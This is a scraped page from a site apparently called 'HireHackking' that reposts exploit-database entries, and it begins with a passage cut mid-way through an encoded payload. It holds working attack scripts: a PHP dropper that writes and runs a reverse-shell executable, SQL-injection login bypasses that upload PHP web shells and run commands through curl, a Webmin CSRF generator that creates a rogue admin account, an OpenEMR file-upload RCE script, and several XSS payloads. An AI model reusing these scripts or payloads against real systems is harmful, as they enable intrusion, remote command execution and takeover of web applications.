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\";\r\n$evalCode = gzinflate(base64_decode($payload));\r\n$evalArguments = \" \".$port.\" \".$ip;\r\n$tmpdir =\"C:\\\\windows\\\\temp\";\r\nchdir($tmpdir);\r\n$res .= \"Using dir : \".$tmpdir;\r\n$filename = \"rev.exe\";\r\n$file = fopen($filename, 'wb');\r\nfwrite($file, $evalCode);\r\nfclose($file);\r\n$path = $filename;\r\n$cmd = $path.$evalArguments;\r\n$res .= \"\\n\\nExecuting : \".$cmd.\"\\n\";\r\necho $res;\r\n$output = system($cmd);\r\n\t\t\t\r\n?>\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY--\r\n" print("\033[1;33;40m Uploading shell...") out = requests.post(req_url, headers=req_headers, data=req_data, verify=False) print("\033[1;31;40m Uploaded shell will be available at "+shellpath+"") print(" Enjoy!") # finding the uploaded shell session = HTMLSession() r = session.get(shellpath) sel = 'a[href*="'+shellfilename+'"]' find_shellfilename = r.html.find(sel) # popping up the shell :p for shellname in find_shellfilename: try: url = shellname.absolute_links.pop() print("\033[1;33;40m Shell is available at "+url+"") response = urllib.request.urlopen(url) print(" Byeee!") except KeyboardInterrupt: exit('User aborted!')
  5. HireHackking

    Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE # Date: 05-07-2021 # Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu) import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import random import os, sys import argparse import optparse import string if len(sys.argv)!=5: print('Usage: -u http://<ip> -c <"command">') print('ex. python3 http://192.168.1.2 -c "ls+-la"') exit() parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url") parser.add_option('-c', '--cmd', action="store", dest="cmd") options,args=parser.parse_args() print(options.url, options.cmd) print(len(sys.argv)) def randomGen(size=8, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size)) urlbase=options.url+'/cman/admin'; loginUrl=urlbase+'/index.php'; shellFile=randomGen()+".php" payload={"username":"test", "password":"' or 'a'='a'#", "login":""}; proxies = { "http": "http://localhost:8080"} mp_encoder = MultipartEncoder(fields = { "image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"), "change":""}) session=requests.Session() r=session.post(loginUrl, payload, allow_redirects=False) #, proxies=proxies) cookie=r.headers["Set-Cookie"] headers = {"Cookie": cookie, 'Content-Type':mp_encoder.content_type} uploadUrl=urlbase+"/admin_pic.php" post=session.post(uploadUrl, data=mp_encoder, allow_redirects=False, headers=headers, proxies=proxies) os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd="+ options.cmd)
  6. HireHackking

    Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS) # Date: 05/21/2019 # Exploit Author: Central InfoSec # Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 # CVE : CVE-2019-0221 # Requirements: # SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default. # A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application. # The file must be accessible. # Proof of Concept: # Install a Java Runtime Environment (JRE) # Download a vulnerable version of Tomcat and extract the contents # Modify line 19 of the conf\context.xml file to globally enable privileged context Context privileged="true"> # Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide # Put the following code in "webapps/ROOT/ssi/printenv.shtml" <html> <body> Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/> Printenv: <!-- #printenv --> </body> </html> # Run Tomcat cd bin catalina run # Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
  7. HireHackking

    Apache Tomcat 9.0.0.M1 - Open Redirect

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect # Date: 10/04/2018 # Exploit Author: Central InfoSec # Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90 # CVE : CVE-2018-11784 # Proof of Concept: # Identify a subfolder within your application http://example.com/test/ # Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash http://example.com//test # Browse to the newly created URL and the application will perform a redirection http://test/
  8. HireHackking

    Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS) # Date: 08/07/2021 # Exploit Author: Subhadip Nag # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Server: XAMPP # Description # Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/ZMSP/zms/admin/index.php and Login(given User & password) 2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php 3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script> 4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php 5) Stored XSS payload is fired 6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php 7) Edit any Action field with the following payload: <script>alert(1)</script> and Update 8) Go back and again click 'Manage Type Ticket' 9) Stored XSS payload is fired 10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php 11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update 12) Goto: http://localhost/ZMSP/zms/admin/contactus.php 13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update 14) Logout and click 'Back Home' 15) Our XSS payload successful # Image PoC : Reference Image # 1) https://ibb.co/g4hFQDV 2) https://ibb.co/frbpf9c 3) https://ibb.co/NtKrc9C 4) https://ibb.co/cFGWhCz 4) https://ibb.co/CMXmN4f 5) https://ibb.co/C0dV0PC 6) https://ibb.co/4ZW8tb3 7) https://ibb.co/3zgFq9b 8) https://ibb.co/wS8wXj8
  9. HireHackking

    WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS) # Date: 11/07/2021 # Exploit Author: Swapnil Subhash Bodekar # Vendor Homepage: # Software Link: https://wordpress.org/plugins/wpfront-notification-bar/ # Version: 1.9.1.04012 # Tested on Windows # Category: Web Application How to reproduce vulnerability: 1. Install WordPress 5.7.2 2. Install and activate *WPFront Notification Bar* plugin. 3. Navigate to *WPFront Notification Bar *>> Setting >> notification bar and fill the required data and enter the below-mentioned payload into the Custom CSS user input field. </textarea><script>prompt(1)</script> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
  10. HireHackking

    Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 12 July 2021 # Exploit Author: Subhadip Nag (mrl0s3r) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html # Tested on: Server: XAMPP # Description # Invoice System 1.0 is vulnerable to 'Multiple 'stored cross site scripting (xss) in the Settings option because of insufficient user supplied data. When anyone visits any other option like(Dashboard,Invoice,Category,Service,Product and also Settings option, our payload will respond as well, and when anyone again Login as Admin the payload works the same as well. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/simple_invoice/admin/login.php 2) Login: Login as a Admin for given credentials: admin | admin123 3) Goto: Settings option 4) In the System Name & Short Name, Enter the payload: <script>+-+-1-+-+alert(1)</script> 5) Click Update 6) our XSS attack fired and Stored 7) Wherever we are clicked in any options, noticed that our Payload responding us 8) Goto: http://localhost/simple_invoice/admin/?page=service 9) Click Create New 10) In the Name and Description field, enter the payload: <<SCRIPT>alert("XSS");//<</SCRIPT> 11) Our XSS attack Successful 12) Goto: http://localhost/simple_invoice/admin/?page=invoice 13) Click Create New 14) In the Customer Name, Unit, Remarks, enter the payload: <script>alert(1)</script> 15) Our XSS attack Successful # PoC image 1) https://ibb.co/JpYdZ4F 2) https://ibb.co/brm00dF 3) https://ibb.co/3crYLSZ 4) https://ibb.co/N9m6fy0 5) https://ibb.co/HGNSJDN 6) https://ibb.co/7tyFY1P 7) https://ibb.co/gZ0BvjB 8) https://ibb.co/2S9J6Xn
  11. HireHackking

    Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF) # Date: 24/04/2021 # Exploit Author: *Mesh3l_911 & Z0ldyck # Vendor Homepage: https://www.webmin.com # Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 # Version: Webmin 1.973 # Tested on: All versions <= 1.973 # CVE : CVE-2021-31762 # POC: https://youtu.be/qCvEXwyaF5U import time, subprocess print('''\033[1;37m __ __ _ ____ _ _________ _ _ _ | \/ | | | |___ \| | |___ / _ \| | | | | | | \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ __/ | |___/ \033[1;m''') for i in range(101): print( "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( i), "\033[1;36m%\033[1;m", end="") time.sleep(0.02) print("\n\n") target = input( "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") if target.endswith('/'): target = target + 'acl/save_user.cgi' else: target = target + '/acl/save_user.cgi' def CSRF_Generator(): with open('CSRF_POC.html', 'w') as POC: POC.write \ (''' <html> <head> <meta name="referrer" content="never"> </head> <body> <script>history.pushState('', '', '/')</script> <form action="'''+target+'''" method="POST"> <input type="hidden" name="safe" value="" /> <input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" /> <input type="hidden" name="pass&#95;def" value="0" /> <input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" /> <input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" /> <input type="hidden" name="cert&#95;def" value="1" /> <input type="hidden" name="lang&#95;def" value="1" /> <input type="hidden" name="lang" value="af" /> <input type="hidden" name="notabs" value="0" /> <input type="hidden" name="theme&#95;def" value="1" /> <input type="hidden" name="theme" value="" /> <input type="hidden" name="overlay&#95;def" value="1" /> <input type="hidden" name="overlay" value="overlay&#45;theme" /> <input type="hidden" name="logouttime&#95;def" value="1" /> <input type="hidden" name="minsize&#95;def" value="1" /> <input type="hidden" name="ipmode" value="0" /> <input type="hidden" name="ips" value="" /> <input type="hidden" name="days&#95;def" value="1" /> <input type="hidden" name="hours&#95;def" value="1" /> <input type="hidden" name="hours&#95;hfrom" value="" /> <input type="hidden" name="hours&#95;mfrom" value="" /> <input type="hidden" name="hours&#95;hto" value="" /> <input type="hidden" name="hours&#95;mto" value="" /> <input type="hidden" name="mod" value="backup&#45;config" /> <input type="hidden" name="mod" value="change&#45;user" /> <input type="hidden" name="mod" value="webmincron" /> <input type="hidden" name="mod" value="usermin" /> <input type="hidden" name="mod" value="webminlog" /> <input type="hidden" name="mod" value="webmin" /> <input type="hidden" name="mod" value="help" /> <input type="hidden" name="mod" value="servers" /> <input type="hidden" name="mod" value="acl" /> <input type="hidden" name="mod" value="bacula&#45;backup" /> <input type="hidden" name="mod" value="init" /> <input type="hidden" name="mod" value="passwd" /> <input type="hidden" name="mod" value="quota" /> <input type="hidden" name="mod" value="mount" /> <input type="hidden" name="mod" value="fsdump" /> <input type="hidden" name="mod" value="ldap&#45;client" /> <input type="hidden" name="mod" value="ldap&#45;useradmin" /> <input type="hidden" name="mod" value="logrotate" /> <input type="hidden" name="mod" value="mailcap" /> <input type="hidden" name="mod" value="mon" /> <input type="hidden" name="mod" value="pam" /> <input type="hidden" name="mod" value="certmgr" /> <input type="hidden" name="mod" value="proc" /> <input type="hidden" name="mod" value="at" /> <input type="hidden" name="mod" value="cron" /> <input type="hidden" name="mod" value="sentry" /> <input type="hidden" name="mod" value="man" /> <input type="hidden" name="mod" value="syslog" /> <input type="hidden" name="mod" value="syslog&#45;ng" /> <input type="hidden" name="mod" value="system&#45;status" /> <input type="hidden" name="mod" value="useradmin" /> <input type="hidden" name="mod" value="apache" /> <input type="hidden" name="mod" value="bind8" /> <input type="hidden" name="mod" value="pserver" /> <input type="hidden" name="mod" value="dhcpd" /> <input type="hidden" name="mod" value="dhcp&#45;dns" /> <input type="hidden" name="mod" value="dovecot" /> <input type="hidden" name="mod" value="exim" /> <input type="hidden" name="mod" value="fetchmail" /> <input type="hidden" name="mod" value="foobar" /> <input type="hidden" name="mod" value="frox" /> <input type="hidden" name="mod" value="jabber" /> <input type="hidden" name="mod" value="ldap&#45;server" /> <input type="hidden" name="mod" value="majordomo" /> <input type="hidden" name="mod" value="htpasswd&#45;file" /> <input type="hidden" name="mod" value="minecraft" /> <input type="hidden" name="mod" value="mysql" /> <input type="hidden" name="mod" value="openslp" /> <input type="hidden" name="mod" value="postfix" /> <input type="hidden" name="mod" value="postgresql" /> <input type="hidden" name="mod" value="proftpd" /> <input type="hidden" name="mod" value="procmail" /> <input type="hidden" name="mod" value="qmailadmin" /> <input type="hidden" name="mod" value="mailboxes" /> <input type="hidden" name="mod" value="sshd" /> <input type="hidden" name="mod" value="samba" /> <input type="hidden" name="mod" value="sendmail" /> <input type="hidden" name="mod" value="spam" /> <input type="hidden" name="mod" value="squid" /> <input type="hidden" name="mod" value="sarg" /> <input type="hidden" name="mod" value="wuftpd" /> <input type="hidden" name="mod" value="webalizer" /> <input type="hidden" name="mod" value="link" /> <input type="hidden" name="mod" value="adsl&#45;client" /> <input type="hidden" name="mod" value="bandwidth" /> <input type="hidden" name="mod" value="fail2ban" /> <input type="hidden" name="mod" value="firewalld" /> <input type="hidden" name="mod" value="ipsec" /> <input type="hidden" name="mod" value="krb5" /> <input type="hidden" name="mod" value="firewall" /> <input type="hidden" name="mod" value="firewall6" /> <input type="hidden" name="mod" value="exports" /> <input type="hidden" name="mod" value="exports&#45;nfs4" /> <input type="hidden" name="mod" value="xinetd" /> <input type="hidden" name="mod" value="inetd" /> <input type="hidden" name="mod" value="pap" /> <input type="hidden" name="mod" value="ppp&#45;client" /> <input type="hidden" name="mod" value="pptp&#45;client" /> <input type="hidden" name="mod" value="pptp&#45;server" /> <input type="hidden" name="mod" value="stunnel" /> <input type="hidden" name="mod" value="shorewall" /> <input type="hidden" name="mod" value="shorewall6" /> <input type="hidden" name="mod" value="itsecur&#45;firewall" /> <input type="hidden" name="mod" value="tcpwrappers" /> <input type="hidden" name="mod" value="idmapd" /> <input type="hidden" name="mod" value="filter" /> <input type="hidden" name="mod" value="burner" /> <input type="hidden" name="mod" value="grub" /> <input type="hidden" name="mod" value="lilo" /> <input type="hidden" name="mod" value="raid" /> <input type="hidden" name="mod" value="lvm" /> <input type="hidden" name="mod" value="fdisk" /> <input type="hidden" name="mod" value="lpadmin" /> <input type="hidden" name="mod" value="smart&#45;status" /> <input type="hidden" name="mod" value="time" /> <input type="hidden" name="mod" value="vgetty" /> <input type="hidden" name="mod" value="iscsi&#45;client" /> <input type="hidden" name="mod" value="iscsi&#45;server" /> <input type="hidden" name="mod" value="iscsi&#45;tgtd" /> <input type="hidden" name="mod" value="iscsi&#45;target" /> <input type="hidden" name="mod" value="cluster&#45;passwd" /> <input type="hidden" name="mod" value="cluster&#45;copy" /> <input type="hidden" name="mod" value="cluster&#45;cron" /> <input type="hidden" name="mod" value="cluster&#45;shell" /> <input type="hidden" name="mod" value="cluster&#45;shutdown" /> <input type="hidden" name="mod" value="cluster&#45;usermin" /> <input type="hidden" name="mod" value="cluster&#45;useradmin" /> <input type="hidden" name="mod" value="cluster&#45;webmin" /> <input type="hidden" name="mod" value="cfengine" /> <input type="hidden" name="mod" value="heartbeat" /> <input type="hidden" name="mod" value="shell" /> <input type="hidden" name="mod" value="custom" /> <input type="hidden" name="mod" value="disk&#45;usage" /> <input type="hidden" name="mod" value="export&#45;test" /> <input type="hidden" name="mod" value="ftelnet" /> <input type="hidden" name="mod" value="filemin" /> <input type="hidden" name="mod" value="flashterm" /> <input type="hidden" name="mod" value="tunnel" /> <input type="hidden" name="mod" value="file" /> <input type="hidden" name="mod" value="phpini" /> <input type="hidden" name="mod" value="cpan" /> <input type="hidden" name="mod" value="htaccess&#45;htpasswd" /> <input type="hidden" name="mod" value="telnet" /> <input type="hidden" name="mod" value="ssh" /> <input type="hidden" name="mod" value="ssh2" /> <input type="hidden" name="mod" value="shellinabox" /> <input type="hidden" name="mod" value="status" /> <input type="hidden" name="mod" value="ajaxterm" /> <input type="hidden" name="mod" value="updown" /> <input type="hidden" name="mod" value="vnc" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ''') POC.close() print( "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") def main(): CSRF_Generator() if __name__ == '__main__': main()
  12. HireHackking

    Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload # Date: 05-07-2021 # Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html # POC: https://www.exploit-db.com/exploits/50085 # Tested On: Ubuntu 21.04 + Apache/2.4.46 (Ubuntu) # Version: 1.0 #====================================================== #imports from requests_toolbelt.multipart.encoder import MultipartEncoder import requests import string import random import os import argparse #generate random string 8 chars def randomGen(size=8, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size)) #generating a random username and a random web shell file user=randomGen() shellFile=randomGen()+".php" #creating a payload for the login payload = { "username":"a", "password":"a' OR 1=1 AND ucat='admin' #" } proxies = {"http":"http://127.0.0.1:8080"} session=requests.Session() #changeme urlBase="http://172.27.1.71/Gabage/" url=urlBase+"login.php" print("=== executing SQL Injection ===") req=session.post(url,payload,allow_redirects=False) cookie=req.headers["Set-Cookie"] print("=== authenticated admin cookie:" + cookie + " ===") url=urlBase+"apatient/users.php?user=rayat" mp_encoder = MultipartEncoder( fields = { "fullname":user, "ucat":"admin", "contact":"0000000000", "address":"aaa ave", "username":user, "acstatus":"active", "date":"2021-07-05", "password":user, "image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"), "submit":"" } ) headers = { "Cookie":cookie, 'Content-Type': mp_encoder.content_type } print("=== creating user " + user + " and uploading shell " + shellFile +" ===") req=session.post(url,data=mp_encoder,allow_redirects=False,headers=headers) #,proxies=proxies) #curl the shell for test requestUrl = "curl " + urlBase + "apatient/contract/"+shellFile+"?cmd=whoami" print("=== issuing a whoami: " + requestUrl + " ===") print("===CURL OUTPUT===") os.system(requestUrl)
  13. HireHackking

    OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)

    HireHackking posted a blog entry in Hacker Technology
    # Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) # Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) # Date: 2021-07-05 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml # Version: < 5.0.1.4 (it means up to 5.0.1.3) # Tested on: OpenEMR Version 5.0.0.8 # References: https://www.exploit-db.com/exploits/49998 # CVE: CVE-2018-15139 # CWE: CWE-434 # Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485 #!/usr/bin/env ruby require 'pathname' require 'httpx' require 'http/form_data' require 'docopt' doc = <<~DOCOPT OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution Source: https://github.com/sec-it/exploit-CVE-2019-14530 Usage: #{__FILE__} exploit <url> <filename> <username> <password> [--debug] #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <filename> Filename of the shell to be uploaded <username> Username of the admin <password> Password of the admin --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} exploit http://example.org/openemr shell.php admin pass #{__FILE__} exploit https://example.org:5000/ shell.php admin pass DOCOPT def login(root_url, user, pass, http) vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default" params = { 'new_login_session_management' => '1', 'authProvider' => 'Default', 'authUser' => user, 'clearPass' => pass, 'languageChoice' => '1' } http.post(vuln_url, form: params).body.to_s end def upload(root_url, filepath, http) vuln_url = "#{root_url}/interface/super/manage_site_files.php" pn = Pathname.new(filepath) params = { form_image: { content_type: 'application/x-php', filename: pn.basename.to_s, body: pn }, bn_save: 'Save' } res = http.post(vuln_url, form: params) return '[-] File not upload' unless (200..299).include?(res.status) "[+] File uploaded:\n#{root_url}/sites/default/images/#{pn.basename}" end begin args = Docopt.docopt(doc) pp args if args['--debug'] if args['exploit'] http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart) login(args['<url>'], args['<username>'], args['<password>'], http) puts upload(args['<url>'], args['<filename>'], http) end rescue Docopt::Exit => e puts e.message end
  14. HireHackking

    WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
